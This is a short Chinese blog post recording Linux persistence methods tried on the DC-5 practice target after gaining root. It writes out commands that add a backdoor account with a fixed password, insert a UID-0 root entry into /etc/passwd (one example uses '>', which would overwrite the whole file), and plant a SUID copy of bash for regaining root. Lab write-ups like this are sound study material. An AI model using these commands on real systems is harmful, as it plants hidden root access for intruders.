This_is_Y
linux权限维持
This_is_Y Lv6
  2021-06-08 15:31:55   2021-06-18 15:45:57  399 字  1 分钟  

以刚刚拿下的DC-5靶机为例,测试一下各种linux权限维持的方法

方法都来自:https://phyb0x.github.io/2018/10/23/linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81-%E5%90%8E%E9%97%A8/

以此记录一下

mbGCWWC

添加超级用户:

添加

1
2
3
4
useradd guest;echo 'guest:123456'|chpasswd
useradd -p `openssl passwd 123456` guest
useradd -p "$(openssl passwd 123456)" guest
useradd newuwer;echo -e "123456n123456n" |passwd newuser

设置root权限

1
2
echo "guest:x:0:0::/:/bin/sh" >> /etc/passwd
echo 'guest:123456'|chpasswd

实际测试中发现添加用户后,passwd文件中就存在那一条数据了,再写的话,修改不了权限,所以我这里先添加数据到passwd中,再添加用户(或者修改密码)

image-20210608171347277

除此之外,还有一个方式添加新用户,
先对密码就行加密
openssl passwd -1 -salt admin admin
-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密,默认选项 加点盐:
得到密文后,拼接为一条消息,写入到passwd文件中,这样子就不需要chpasswd了
admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash
echo ‘admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash’ > /etc/passwd

有些时候添加不成功是因为用户策略可以适当加强密码强度
有些也会限制root权限用户远程登录

SUID shell

提权后,cp /bin/bash /.test
chmod 4755 /.test
之后以普通用户运行
/.test -p

image-20210608172859611
euid:effective user ID:有效用户ID,指进程执行时对文件的访问权限

后面的由于环境不合适,就没测了。

 评论
评论插件加载失败
正在加载评论插件
  1. 添加超级用户:
  2. SUID shell
© 2021 - 2024    This_is_Y
由 Hexo 驱动 & 主题 Keep
访客数 访问量
  1. 添加超级用户:
  2. SUID shell